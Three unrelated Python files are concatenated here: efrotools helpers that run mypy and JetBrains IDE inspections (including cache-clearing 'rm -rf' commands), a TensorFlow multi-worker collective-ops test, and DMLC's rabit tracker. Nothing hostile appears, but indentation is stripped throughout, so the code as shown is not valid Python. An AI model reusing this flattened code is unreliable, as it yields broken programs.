depsval = [names_to_paths[dep] for dep in deps[fmod]]
cache.entries[fname]['deps'] = depsval
# Let's print a list of modules with no detected deps so we can make sure
# this is behaving.
if no_deps_modules:
if bool(False):
print('NOTE: no dependencies found for:',
', '.join(no_deps_modules))
# Ok, now go through all dirtyfiles involved in this run.
# Mark them as either errored or clean depending on whether there's
# error info for them in the run stats.
# Once again need to convert any foo.bar.__init__ to foo.bar.
stats_by_module: Dict[str, Any] = {
_filter_module_name(key): val
for key, val in run.linter.stats['by_module'].items()
}
errcount = 0
for fname in dirtyfiles:
mname2 = paths_to_names.get(fname)
if mname2 is None:
raise Exception('unable to get module name for "' + fname + '"')
counts = stats_by_module.get(mname2)
# 'statement' count seems to be new and always non-zero; ignore it
if counts is not None:
counts = {c: v for c, v in counts.items() if c != 'statement'}
if (counts is not None and any(counts.values())) or have_dep_cycles:
# print('GOT FAIL FOR', fname, counts)
if 'hash' in cache.entries[fname]:
del cache.entries[fname]['hash']
errcount += 1
else:
# print('MARKING FILE CLEAN', mname2, fname)
cache.entries[fname]['hash'] = (cache.curhashes[fname])
return errcount
def _filter_module_name(mpath: str) -> str:
"""Filter weird module paths such as 'foo.bar.__init__' to 'foo.bar'."""
# Seems Pylint returns module paths with __init__ on the end in some cases
# and not in others. Could dig into it, but for now just filtering them
# out...
return mpath[:-9] if mpath.endswith('.__init__') else mpath
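# For example (module names here are illustrative):
# _filter_module_name('ba.ui.__init__') returns 'ba.ui', while
# _filter_module_name('ba.ui') comes back unchanged.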
def runmypy(projroot: Path,
filenames: List[str],
full: bool = False,
check: bool = True) -> None:
"""Run MyPy on provided filenames."""
from efrotools import PYTHON_BIN
args = [
PYTHON_BIN, '-m', 'mypy', '--pretty', '--no-error-summary',
'--config-file',
str(Path(projroot, '.mypy.ini'))
] + filenames
if full:
args.insert(args.index('mypy') + 1, '--no-incremental')
subprocess.run(args, check=check)
def mypy(projroot: Path, full: bool) -> None:
"""Type check all of our scripts using mypy."""
import time
from efro.terminal import Clr
from efro.error import CleanError
filenames = get_script_filenames(projroot)
desc = '(full)' if full else '(incremental)'
print(f'{Clr.BLU}Running Mypy {desc}...{Clr.RST}', flush=True)
starttime = time.time()
try:
runmypy(projroot, filenames, full)
except Exception as exc:
raise CleanError('Mypy failed.') from exc
duration = time.time() - starttime
print(f'{Clr.GRN}Mypy passed in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def dmypy(projroot: Path) -> None:
"""Type check all of our scripts using mypy in daemon mode."""
import time
from efro.terminal import Clr
from efro.error import CleanError
filenames = get_script_filenames(projroot)
# Special case; explicitly kill the daemon.
if '-stop' in sys.argv:
subprocess.run(['dmypy', 'stop'], check=False)
return
print('Running Mypy (daemon)...', flush=True)
starttime = time.time()
try:
args = [
'dmypy', 'run', '--timeout', '3600', '--', '--config-file',
'.mypy.ini', '--pretty'
] + filenames
subprocess.run(args, check=True)
except Exception as exc:
raise CleanError('Mypy daemon: fail.') from exc
duration = time.time() - starttime
print(f'{Clr.GRN}Mypy daemon passed in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def _parse_idea_results(path: Path) -> int:
"""Print errors found in an idea inspection xml file.
Returns the number of errors found.
"""
import xml.etree.ElementTree as Et
error_count = 0
root = Et.parse(str(path)).getroot()
for child in root:
line: Optional[str] = None
description: Optional[str] = None
fname: Optional[str] = None
if child.tag == 'problem':
is_error = True
for pchild in child:
if pchild.tag == 'problem_class':
# We still report typos but we don't fail the
# check due to them (that just gets tedious).
if pchild.text == 'Typo':
is_error = False
if pchild.tag == 'line':
line = pchild.text
if pchild.tag == 'description':
description = pchild.text
if pchild.tag == 'file':
fname = pchild.text
if isinstance(fname, str):
fname = fname.replace('file://$PROJECT_DIR$/', '')
print(f'{fname}:{line}: {description}')
if is_error:
error_count += 1
return error_count
def _run_idea_inspections(projroot: Path,
scripts: List[str],
displayname: str,
inspect: Path,
verbose: bool,
inspectdir: Path = None) -> None:
"""Actually run idea inspections.
Throw an Exception if anything is found or goes wrong.
"""
# pylint: disable=too-many-locals
import tempfile
import time
import datetime
from efro.error import CleanError
from efro.terminal import Clr
start_time = time.time()
print(
f'{Clr.BLU}{displayname} checking'
f' {len(scripts)} file(s)...{Clr.RST}',
flush=True)
tmpdir = tempfile.TemporaryDirectory()
iprof = Path(projroot, '.idea/inspectionProfiles/Default.xml')
if not iprof.exists():
iprof = Path(projroot, '.idea/inspectionProfiles/Project_Default.xml')
if not iprof.exists():
raise Exception('No default inspection profile found.')
cmd = [str(inspect), str(projroot), str(iprof), tmpdir.name, '-v2']
if inspectdir is not None:
cmd += ['-d', str(inspectdir)]
running = True
def heartbeat() -> None:
"""Print the time occasionally to make the log more informative."""
while running:
time.sleep(60)
print('Heartbeat', datetime.datetime.now(), flush=True)
if verbose:
import threading
print(cmd, flush=True)
threading.Thread(target=heartbeat, daemon=True).start()
result = subprocess.run(cmd, capture_output=not verbose, check=False)
running = False
if result.returncode != 0:
# In verbose mode this stuff got printed already.
if not verbose:
stdout = (
result.stdout.decode() if isinstance( # type: ignore
result.stdout, bytes) else str(result.stdout))
stderr = (
result.stderr.decode() if isinstance( # type: ignore
result.stderr, bytes) else str(result.stderr))
print(f'{displayname} inspection failure stdout:\n{stdout}' +
f'{displayname} inspection failure stderr:\n{stderr}')
raise RuntimeError(f'{displayname} inspection failed.')
files = [f for f in os.listdir(tmpdir.name) if not f.startswith('.')]
total_errors = 0
if files:
for fname in files:
total_errors += _parse_idea_results(Path(tmpdir.name, fname))
if total_errors > 0:
raise CleanError(f'{Clr.SRED}{displayname} inspection'
f' found {total_errors} error(s).{Clr.RST}')
duration = time.time() - start_time
print(
f'{Clr.GRN}{displayname} passed for {len(scripts)} files'
f' in {duration:.1f} seconds.{Clr.RST}',
flush=True)
def _run_idea_inspections_cached(cachepath: Path,
filenames: List[str],
full: bool,
projroot: Path,
displayname: str,
inspect: Path,
verbose: bool,
inspectdir: Path = None) -> None:
# pylint: disable=too-many-locals
import hashlib
import json
from efro.terminal import Clr
md5 = hashlib.md5()
# Let's calc a single hash from the contents of all script files and only
# run checks when that changes. Sadly there's not much else optimization
# wise that we can easily do, but this will at least prevent re-checks when
# nothing at all has changed.
for filename in filenames:
with open(filename, 'rb') as infile:
md5.update(infile.read())
# Also hash a few .idea files so we re-run inspections when they change.
extra_hash_paths = [
Path(projroot, '.idea/inspectionProfiles/Default.xml'),
Path(projroot, '.idea/inspectionProfiles/Project_Default.xml'),
Path(projroot, '.idea/dictionaries/ericf.xml')
]
for epath in extra_hash_paths:
if os.path.exists(epath):
with open(epath, 'rb') as infile:
md5.update(infile.read())
current_hash = md5.hexdigest()
existing_hash: Optional[str]
try:
with open(cachepath) as infile2:
existing_hash = json.loads(infile2.read())['hash']
except Exception:
existing_hash = None
if full or current_hash != existing_hash:
_run_idea_inspections(projroot,
filenames,
displayname,
inspect=inspect,
verbose=verbose,
inspectdir=inspectdir)
cachepath.parent.mkdir(parents=True, exist_ok=True)
with open(cachepath, 'w') as outfile:
outfile.write(json.dumps({'hash': current_hash}))
print(
f'{Clr.GRN}{displayname}: all {len(filenames)}'
f' files are passing.{Clr.RST}',
flush=True)
def check_pycharm(projroot: Path, full: bool, verbose: bool) -> None:
"""Run pycharm inspections on all our scripts."""
import time
# FIXME: Generalize this to work with at least linux, possibly windows.
cachepath = Path('.cache/check_pycharm')
filenames = get_script_filenames(projroot)
pycharmroot = Path('/Applications/PyCharm CE.app')
pycharmbin = Path(pycharmroot, 'Contents/MacOS/pycharm')
inspect = Path(pycharmroot, 'Contents/bin/inspect.sh')
# In full mode, clear out pycharm's caches first.
# It seems we need to spin up the GUI and give it a bit to
# re-cache system python for this to work...
# UPDATE: This really slows things down, so we now only do it in
# very specific cases where time isn't important.
# (such as our daily full-test-runs)
# UPDATE 2: Looks like we might no longer need to do the GUI spin-up bit.
# If we can be certain of this, we can go back to simply blowing away
# the cache for 'full' mode checks without the env var.
if full and os.environ.get('EFROTOOLS_FULL_PYCHARM_RECACHE') == '1':
print('Clearing PyCharm caches...', flush=True)
subprocess.run('rm -rf ~/Library/Caches/JetBrains/PyCharmCE*',
shell=True,
check=True)
# Hoping this isn't necessary anymore. Need to rework this if it is,
# since it now gets run through ssh and gui stuff doesn't seem to
# work that way.
if bool(False):
print('Launching GUI PyCharm to rebuild caches...', flush=True)
process = subprocess.Popen(str(pycharmbin))
# Wait a bit and ask it nicely to die.
# We need to make sure it has enough time to do its cache updating
# thing even if the system is fully under load.
time.sleep(5 * 60)
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
subprocess.run(
"osascript -e 'tell application \"PyCharm CE\" to quit'",
shell=True,
check=False)
# process.terminate()
print('Waiting for GUI PyCharm to quit...', flush=True)
process.wait()
_run_idea_inspections_cached(cachepath=cachepath,
filenames=filenames,
full=full,
projroot=projroot,
displayname='PyCharm',
inspect=inspect,
verbose=verbose)
def check_clioncode(projroot: Path, full: bool, verbose: bool) -> None:
"""Run clion inspections on all our code."""
import time
cachepath = Path('.cache/check_clioncode')
filenames = get_code_filenames(projroot)
clionroot = Path('/Applications/CLion.app')
clionbin = Path(clionroot, 'Contents/MacOS/clion')
inspect = Path(clionroot, 'Contents/bin/inspect.sh')
# At the moment offline clion inspections seem a bit flaky.
# They don't seem to run at all if we haven't opened the project
# in the GUI, and it seems recent changes can get ignored for that
# reason too.
# So for now let's try blowing away caches, launching the gui
# temporarily, and then kicking off inspections after that. Sigh.
print('Clearing CLion caches...', flush=True)
subprocess.run('rm -rf ~/Library/Caches/CLion*', shell=True, check=True)
# UPDATE: seems this is unnecessary now; should double check.
# Note: I'm assuming this project needs to be open when the GUI
# comes up. Currently just have one project so can rely on auto-open
# but may need to get fancier later if that changes.
if bool(False):
print('Launching GUI CLion to rebuild caches...', flush=True)
process = subprocess.Popen(str(clionbin))
# Wait a moment and ask it nicely to die.
waittime = 120
while waittime > 0:
print(f'Waiting for {waittime} more seconds.')
time.sleep(10)
waittime -= 10
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
subprocess.run("osascript -e 'tell application \"CLion\" to quit'",
shell=True,
check=False)
# process.terminate()
print('Waiting for GUI CLion to quit...', flush=True)
process.wait(timeout=60)
print('Launching Offline CLion to run inspections...', flush=True)
_run_idea_inspections_cached(
cachepath=cachepath,
filenames=filenames,
full=full,
projroot=Path(projroot, 'ballisticacore-cmake'),
inspectdir=Path(projroot, 'ballisticacore-cmake/src/ballistica'),
displayname='CLion',
inspect=inspect,
verbose=verbose)
def check_android_studio(projroot: Path, full: bool, verbose: bool) -> None:
"""Run Android Studio inspections on all our code."""
# import time
cachepath = Path('.cache/check_android_studio')
filenames = get_code_filenames(projroot)
clionroot = Path('/Applications/Android Studio.app')
# clionbin = Path(clionroot, 'Contents/MacOS/studio')
inspect = Path(clionroot, 'Contents/bin/inspect.sh')
# At the moment offline clion inspections seem a bit flaky.
# They don't seem to run at all if we haven't opened the project
# in the GUI, and it seems recent changes can get ignored for that
# reason too.
# So for now let's try blowing away caches, launching the gui
# temporarily, and then kicking off inspections after that. Sigh.
# print('Clearing Android Studio caches...', flush=True)
# subprocess.run('rm -rf ~/Library/Caches/AndroidStudio*',
# shell=True,
# check=True)
# Note: I'm assuming this project needs to be open when the GUI
# comes up. Currently just have one project so can rely on auto-open
# but may need to get fancier later if that changes.
# print('Launching GUI CLion to rebuild caches...', flush=True)
# process = subprocess.Popen(str(clionbin))
# Wait a moment and ask it nicely to die.
# time.sleep(120)
# Seems killing it via applescript is more likely to leave it
# in a working state for offline inspections than TERM signal..
# subprocess.run(
# "osascript -e 'tell application \"Android Studio\" to quit'",
# shell=True)
# process.terminate()
# print('Waiting for GUI CLion to quit...', flush=True)
# process.wait(timeout=60)
print('Launching Offline Android Studio to run inspections...', flush=True)
_run_idea_inspections_cached(
cachepath=cachepath,
filenames=filenames,
full=full,
projroot=Path(projroot, 'ballisticacore-android'),
inspectdir=Path(
projroot,
'ballisticacore-android/BallisticaCore/src/main/cpp/src/ballistica'
),
# inspectdir=None,
displayname='Android Studio',
inspect=inspect,
verbose=verbose)
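# Illustrative usage sketch (not part of the original module): these check_*
# helpers are normally driven by a project-level tool from the repo root. The
# calls below are hypothetical; paths and flags are examples only.
#
#   from pathlib import Path
#   check_pycharm(Path('/path/to/project'), full=False, verbose=True)
#   check_clioncode(Path('/path/to/project'), full=False, verbose=True)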
|
collective_ops_multi_worker_test.py
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for multi worker Collective Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import copy
import os
import threading
import time
from absl.testing import parameterized
from tensorflow.core.protobuf import tensorflow_server_pb2
from tensorflow.python.distribute import cluster_resolver as cluster_resolver_lib
from tensorflow.python.distribute import combinations
from tensorflow.python.distribute import multi_process_runner
from tensorflow.python.distribute import multi_worker_test_base
from tensorflow.python.eager import context
from tensorflow.python.eager import test
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.ops import collective_ops
def enable_collective_ops(cluster_resolver):
context.context().configure_collective_ops(
collective_leader="/job:worker/replica:0/task:0")
config_proto = copy.deepcopy(context.context().config)
server_def = tensorflow_server_pb2.ServerDef(
cluster=cluster_resolver.cluster_spec().as_cluster_def(),
default_session_config=config_proto,
job_name=cluster_resolver.task_type,
task_index=cluster_resolver.task_id,
protocol=cluster_resolver.rpc_layer or "grpc")
context.context().enable_collective_ops(server_def)
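# Illustrative note (not part of the test): outside of these tests, a worker
# would typically get its cluster info from the TF_CONFIG environment variable
# before calling enable_collective_ops, e.g.
#
#   os.environ["TF_CONFIG"] = json.dumps({
#       "cluster": {"worker": ["localhost:20000", "localhost:20001"]},
#       "task": {"type": "worker", "index": 0},
#   })
#   enable_collective_ops(cluster_resolver_lib.TFConfigClusterResolver())
#
# Here, multi_process_runner/multi_worker_test_base set TF_CONFIG for each
# subprocess instead (the json import is shown for illustration only).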
def enable_collective_ops_with_barrier(cluster_resolver):
multi_process_runner.get_barrier().wait()
enable_collective_ops(cluster_resolver)
multi_process_runner.get_barrier().wait()
device_combination = (
combinations.combine(device="CPU", communication="RING", required_gpus=0) +
combinations.combine(
device="GPU", communication=["RING", "NCCL"], required_gpus=1))
class CollectiveOpTest(test.TestCase):
def testCheckHealth(self):
def worker_fn():
enable_collective_ops(cluster_resolver_lib.TFConfigClusterResolver())
      # There may be some delay before the servers start up, so check health
      # should eventually succeed.
while True:
try:
for task in [
"/job:worker/replica:0/task:0",
"/job:worker/replica:0/task:1",
]:
context.context().check_collective_ops_peer_health(
task, timeout_in_ms=1000)
except (errors.UnavailableError, errors.DeadlineExceededError):
continue
break
multi_process_runner.get_barrier().wait()
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
mpr = multi_process_runner.MultiProcessRunner(worker_fn, cluster_spec)
mpr.start()
mpr.join()
def testCheckHealthPeerDown(self):
def worker_fn():
enable_collective_ops(cluster_resolver_lib.TFConfigClusterResolver())
context.context().check_collective_ops_peer_health(
"/job:worker/replica:0/task:1", timeout_in_ms=1000)
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
mpr = multi_process_runner.MultiProcessRunner(worker_fn, cluster_spec)
mpr.start_single_process("worker", 0)
with self.assertRaises(
(errors.UnavailableError, errors.DeadlineExceededError)):
mpr.join()
def testCheckHealthPeerRestart(self):
def worker_fn():
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
enable_collective_ops(cluster_resolver)
collective_ops.all_reduce(
constant_op.constant(1.),
group_size=2,
group_key=100,
instance_key=100,
merge_op="Add",
final_op="Id",
communication_hint="ring")
if cluster_resolver.task_type == "worker":
# MultiProcessRunner will auto restart worker-0.
os._exit(1) # pylint: disable=protected-access
else:
        # chief should eventually get FailedPreconditionError after worker-0
# has restarted.
while True:
time.sleep(1)
try:
context.context().check_collective_ops_peer_health(
"/job:worker/replica:0/task:0", timeout_in_ms=1000)
except errors.UnavailableError:
pass
except errors.FailedPreconditionError:
break
cluster_spec = multi_worker_test_base.create_cluster_spec(
has_chief=True, num_workers=1)
mpr = multi_process_runner.MultiProcessRunner(
worker_fn, cluster_spec, auto_restart=True)
mpr.start()
mpr.join()
def testCheckHealthInvalidPeer(self):
def worker_fn():
enable_collective_ops(cluster_resolver_lib.TFConfigClusterResolver())
context.context().check_collective_ops_peer_health(
"localhost:12345", timeout_in_ms=1000)
cluster_spec = multi_worker_test_base.create_cluster_spec(num_workers=2)
mpr = multi_process_runner.MultiProcessRunner(worker_fn, cluster_spec)
mpr.start_single_process("worker", 0)
with self.assertRaises(errors.InvalidArgumentError):
mpr.join()
two_worker_pool_runner = multi_process_runner.MultiProcessPoolRunner(
multi_worker_test_base.create_cluster_spec(num_workers=2),
initializer=lambda: enable_collective_ops(cluster_resolver_lib.
TFConfigClusterResolver()))
@combinations.generate(
combinations.times(
combinations.combine(
mode="eager", num_workers=2, runner=two_worker_pool_runner),
device_combination))
class AbortCollectiveOpsTest(test.TestCase, parameterized.TestCase):
def testAbortCommunication(self, device, communication):
if communication == "NCCL":
self.skipTest("b/171358086: cannot test multi worker NCCL")
dev0 = "/device:%s:0" % device
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
enable_collective_ops_with_barrier(cluster_resolver)
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal all-reduce to complete the group and instance
# resolution.
with ops.device(dev0):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
if cluster_resolver.task_id == 1:
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, "peer down")
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
with ops.device(dev0):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
with ops.device(dev0):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
t.join()
# Enable collective ops again in order to reset the collective executor.
enable_collective_ops_with_barrier(cluster_resolver)
with ops.device(dev0):
collective_ops.all_reduce(
in_tensor,
group_size,
group_key,
instance_key,
communication_hint=communication)
def testAbortGroupParamsResolution(self, device, communication):
if communication == "NCCL":
self.skipTest("b/171358086: cannot test multi worker NCCL")
dev0 = "/device:%s:0" % device
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
enable_collective_ops_with_barrier(cluster_resolver)
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
if cluster_resolver.task_id == 1:
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, "peer down")
t = threading.Thread(target=abort_fn)
t.start()
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_ops.all_reduce(in_tensor, group_size, group_key,
instance_key)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
with ops.device(dev0):
collective_ops.all_reduce(in_tensor, group_size, group_key,
instance_key)
t.join()
# Enable collective ops again in order to reset the collective executor.
enable_collective_ops_with_barrier(cluster_resolver)
with ops.device(dev0):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key)
def testAbortInstanceParamsResolution(self, device, communication):
if communication == "NCCL":
self.skipTest("b/171358086: cannot test multi worker NCCL")
dev0 = "/device:%s:0" % device
cluster_resolver = cluster_resolver_lib.TFConfigClusterResolver()
enable_collective_ops_with_barrier(cluster_resolver)
group_size = 2
group_key = 100
instance_key = 100
in_tensor = constant_op.constant([1.])
# First perform a normal all-reduce to complete the group resolution.
with ops.device(dev0):
collective_ops.all_reduce(in_tensor, group_size, group_key, instance_key)
# We use broadcast to test aborting instance resolution since only broadcast
# waits for the group.
if cluster_resolver.task_id == 1:
def abort_fn():
time.sleep(2)
context.context().abort_collective_ops(errors.UNAVAILABLE, "peer down")
t = threading.Thread(target=abort_fn)
t.start()
# Use a different instance key to trigger another instance resolution.
instance_key = 101
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
# This hangs on params resolution since we're only launching one
# collective for a group size of 2.
with ops.device(dev0):
collective_ops.broadcast_send(in_tensor, (1,), dtypes.float32,
group_size, group_key, instance_key)
# After abortion, subsequent collectives should fail immediately.
with self.assertRaisesRegex(errors.UnavailableError, "peer down"):
with ops.device(dev0):
collective_ops.broadcast_send(in_tensor, (1,), dtypes.float32,
group_size, group_key, instance_key)
t.join()
# Enable collective ops again in order to reset the collective executor.
enable_collective_ops_with_barrier(cluster_resolver)
# Reassign instance_key so that it's the same on each worker.
instance_key = 100
with ops.device(dev0):
if cluster_resolver.task_id == 0:
collective_ops.broadcast_send(in_tensor, (1,), dtypes.float32,
group_size, group_key, instance_key)
else:
collective_ops.broadcast_recv((1,), dtypes.float32, group_size,
group_key, instance_key)
if __name__ == "__main__":
multi_process_runner.test_main()
|
tracker.py
|
"""
Tracker script for DMLC
Implements the tracker control protocol
- start dmlc jobs
- start ps scheduler and rabit tracker
- help nodes to establish links with each other
Tianqi Chen
"""
# pylint: disable=invalid-name, missing-docstring, too-many-arguments, too-many-locals
# pylint: disable=too-many-branches, too-many-statements
from __future__ import absolute_import
import os
import sys
import socket
import struct
import subprocess
import argparse
import time
import logging
from threading import Thread
class ExSocket(object):
"""
Extension of socket to handle recv and send of special data
"""
def __init__(self, sock):
self.sock = sock
def recvall(self, nbytes):
res = []
nread = 0
while nread < nbytes:
chunk = self.sock.recv(min(nbytes - nread, 1024))
nread += len(chunk)
res.append(chunk)
return b''.join(res)
def recvint(self):
return struct.unpack('@i', self.recvall(4))[0]
def sendint(self, n):
self.sock.sendall(struct.pack('@i', n))
def sendstr(self, s):
self.sendint(len(s))
self.sock.sendall(s.encode())
def recvstr(self):
slen = self.recvint()
return self.recvall(slen).decode()
# magic number used to verify existence of data
kMagic = 0xff99
def get_some_ip(host):
return socket.getaddrinfo(host, None)[0][4][0]
def get_family(addr):
return socket.getaddrinfo(addr, None)[0][0]
class SlaveEntry(object):
def __init__(self, sock, s_addr):
slave = ExSocket(sock)
self.sock = slave
self.host = get_some_ip(s_addr[0])
magic = slave.recvint()
if magic != kMagic:
            logging.warning(
                'invalid magic number=%d from %s; possible causes:\n'
                ' 1. the tracker process was killed\n'
                ' 2. another service is sending requests to the tracker port' % (
                    magic, self.host))
logging.warning('you can run "python tracker.py --num-workers=1"')
slave.sendint(kMagic)
self.rank = slave.recvint()
self.world_size = slave.recvint()
self.jobid = slave.recvstr()
self.cmd = slave.recvstr()
self.wait_accept = 0
self.port = None
def decide_rank(self, job_map):
if self.rank >= 0:
return self.rank
if self.jobid != 'NULL' and self.jobid in job_map:
return job_map[self.jobid]
return -1
def assign_rank(self, rank, wait_conn, tree_map, parent_map, ring_map):
self.rank = rank
nnset = set(tree_map[rank])
rprev, rnext = ring_map[rank]
self.sock.sendint(rank)
# send parent rank
self.sock.sendint(parent_map[rank])
# send world size
self.sock.sendint(len(tree_map))
self.sock.sendint(len(nnset))
        # send the tree neighbor links
for r in nnset:
self.sock.sendint(r)
# send prev link
if rprev != -1 and rprev != rank:
nnset.add(rprev)
self.sock.sendint(rprev)
else:
self.sock.sendint(-1)
# send next link
if rnext != -1 and rnext != rank:
nnset.add(rnext)
self.sock.sendint(rnext)
else:
self.sock.sendint(-1)
while True:
ngood = self.sock.recvint()
goodset = set([])
for _ in range(ngood):
goodset.add(self.sock.recvint())
assert goodset.issubset(nnset)
badset = nnset - goodset
conset = []
for r in badset:
if r in wait_conn:
conset.append(r)
self.sock.sendint(len(conset))
self.sock.sendint(len(badset) - len(conset))
for r in conset:
self.sock.sendstr(wait_conn[r].host)
self.sock.sendint(wait_conn[r].port)
self.sock.sendint(r)
nerr = self.sock.recvint()
if nerr != 0:
continue
self.port = self.sock.recvint()
rmset = []
            # all connections were successfully set up
for r in conset:
wait_conn[r].wait_accept -= 1
if wait_conn[r].wait_accept == 0:
rmset.append(r)
for r in rmset:
wait_conn.pop(r, None)
self.wait_accept = len(badset) - len(conset)
return rmset
class RabitTracker(object):
"""
tracker for rabit
"""
def __init__(self, hostIP, nslave, port=9091, port_end=9999):
sock = socket.socket(get_family(hostIP), socket.SOCK_STREAM)
for port in range(port, port_end):
try:
sock.bind((hostIP, port))
self.port = port
break
except socket.error as e:
if e.errno in [98, 48]:
continue
else:
raise
sock.listen(256)
self.sock = sock
self.hostIP = hostIP
self.thread = None
self.start_time = None
self.end_time = None
self.nslave = nslave
logging.info('start listen on %s:%d', hostIP, self.port)
def __del__(self):
self.sock.close()
@staticmethod
def get_neighbor(rank, nslave):
rank = rank + 1
ret = []
if rank > 1:
ret.append(rank // 2 - 1)
if rank * 2 - 1 < nslave:
ret.append(rank * 2 - 1)
if rank * 2 < nslave:
ret.append(rank * 2)
return ret
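    # Worked example (added note): ranks form a 1-indexed binary heap, so with
    # nslave=7 the neighbor lists are
    #   rank 0 -> [1, 2], rank 1 -> [0, 3, 4], rank 2 -> [0, 5, 6],
    #   rank 3 -> [1],    rank 4 -> [1],       rank 5 -> [2],    rank 6 -> [2]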
def slave_envs(self):
"""
        get environment variables for slaves;
        these can be passed in as args or envs
"""
return {'DMLC_TRACKER_URI': self.hostIP,
'DMLC_TRACKER_PORT': self.port}
def get_tree(self, nslave):
tree_map = {}
parent_map = {}
for r in range(nslave):
tree_map[r] = self.get_neighbor(r, nslave)
parent_map[r] = (r + 1) // 2 - 1
return tree_map, parent_map
def find_share_ring(self, tree_map, parent_map, r):
"""
get a ring structure that tends to share nodes with the tree
return a list starting from r
"""
nset = set(tree_map[r])
cset = nset - set([parent_map[r]])
if len(cset) == 0:
return [r]
rlst = [r]
cnt = 0
for v in cset:
vlst = self.find_share_ring(tree_map, parent_map, v)
cnt += 1
if cnt == len(cset):
vlst.reverse()
rlst += vlst
return rlst
def get_ring(self, tree_map, parent_map):
"""
get a ring connection used to recover local data
"""
assert parent_map[0] == -1
rlst = self.find_share_ring(tree_map, parent_map, 0)
assert len(rlst) == len(tree_map)
ring_map = {}
nslave = len(tree_map)
for r in range(nslave):
rprev = (r + nslave - 1) % nslave
rnext = (r + 1) % nslave
ring_map[rlst[r]] = (rlst[rprev], rlst[rnext])
return ring_map
def get_link_map(self, nslave):
"""
        get the link map; this is a bit hacky and calls for a better algorithm
        to place similar nodes together
"""
tree_map, parent_map = self.get_tree(nslave)
ring_map = self.get_ring(tree_map, parent_map)
rmap = {0 : 0}
k = 0
for i in range(nslave - 1):
k = ring_map[k][1]
rmap[k] = i + 1
ring_map_ = {}
tree_map_ = {}
parent_map_ = {}
for k, v in ring_map.items():
ring_map_[rmap[k]] = (rmap[v[0]], rmap[v[1]])
for k, v in tree_map.items():
tree_map_[rmap[k]] = [rmap[x] for x in v]
for k, v in parent_map.items():
if k != 0:
parent_map_[rmap[k]] = rmap[v]
else:
parent_map_[rmap[k]] = -1
return tree_map_, parent_map_, ring_map_
def accept_slaves(self, nslave):
        # set of nodes that have finished the job
shutdown = {}
        # set of nodes that are waiting for connections
wait_conn = {}
# maps job id to rank
job_map = {}
        # list of workers that are waiting to be assigned a rank
pending = []
# lazy initialize tree_map
tree_map = None
while len(shutdown) != nslave:
fd, s_addr = self.sock.accept()
s = SlaveEntry(fd, s_addr)
if s.cmd == 'print':
msg = s.sock.recvstr()
logging.info(msg.strip())
continue
if s.cmd == 'shutdown':
assert s.rank >= 0 and s.rank not in shutdown
assert s.rank not in wait_conn
shutdown[s.rank] = s
                logging.debug('Received %s signal from %d', s.cmd, s.rank)
continue
assert s.cmd == 'start' or s.cmd == 'recover'
# lazily initialize the slaves
if tree_map is None:
assert s.cmd == 'start'
if s.world_size > 0:
nslave = s.world_size
tree_map, parent_map, ring_map = self.get_link_map(nslave)
                # set of nodes that are still waiting to start up
todo_nodes = list(range(nslave))
else:
assert s.world_size == -1 or s.world_size == nslave
if s.cmd == 'recover':
assert s.rank >= 0
rank = s.decide_rank(job_map)
# batch assignment of ranks
if rank == -1:
assert len(todo_nodes) != 0
pending.append(s)
if len(pending) == len(todo_nodes):
pending.sort(key=lambda x: x.host)
for s in pending:
rank = todo_nodes.pop(0)
if s.jobid != 'NULL':
job_map[s.jobid] = rank
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
if s.wait_accept > 0:
wait_conn[rank] = s
                        logging.debug('Received %s signal from %s; assigned rank %d',
s.cmd, s.host, s.rank)
if len(todo_nodes) == 0:
logging.info('@tracker All of %d nodes getting started', nslave)
self.start_time = time.time()
else:
s.assign_rank(rank, wait_conn, tree_map, parent_map, ring_map)
                logging.debug('Received %s signal from %d', s.cmd, s.rank)
if s.wait_accept > 0:
wait_conn[rank] = s
logging.info('@tracker All nodes finishes job')
self.end_time = time.time()
logging.info('@tracker %s secs between node start and job finish',
str(self.end_time - self.start_time))
def start(self, nslave):
def run():
self.accept_slaves(nslave)
self.thread = Thread(target=run, args=())
        self.thread.daemon = True
self.thread.start()
def join(self):
        while self.thread.is_alive():
self.thread.join(100)
def alive(self):
        return self.thread.is_alive()
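# Illustrative note (added): a worker process discovers the tracker through the
# two environment variables returned by slave_envs(), e.g.
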